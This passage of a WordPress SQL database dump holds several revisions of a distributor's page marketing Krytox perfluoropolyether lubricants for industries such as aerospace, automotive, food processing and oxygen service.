Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:24:12', '2016-09-28 19:24:12', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2118, 2, '2016-09-28 19:26:31', '2016-09-28 19:26:31', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<Aerospace, Aviation, and National Defense="aerospace">\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:26:31', '2016-09-28 19:26:31', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2119, 15, '2016-09-28 19:28:42', '2016-09-28 19:28:42', '', '', '', 'publish', 'closed', 'closed', '', '2119', '', '', '2016-09-28 19:28:42', '2016-09-28 19:28:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/2119/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2120, 2, '2016-09-28 19:34:11', '2016-09-28 19:34:11', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<strong>Aerospace, Aviation, and National Defense</strong>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top 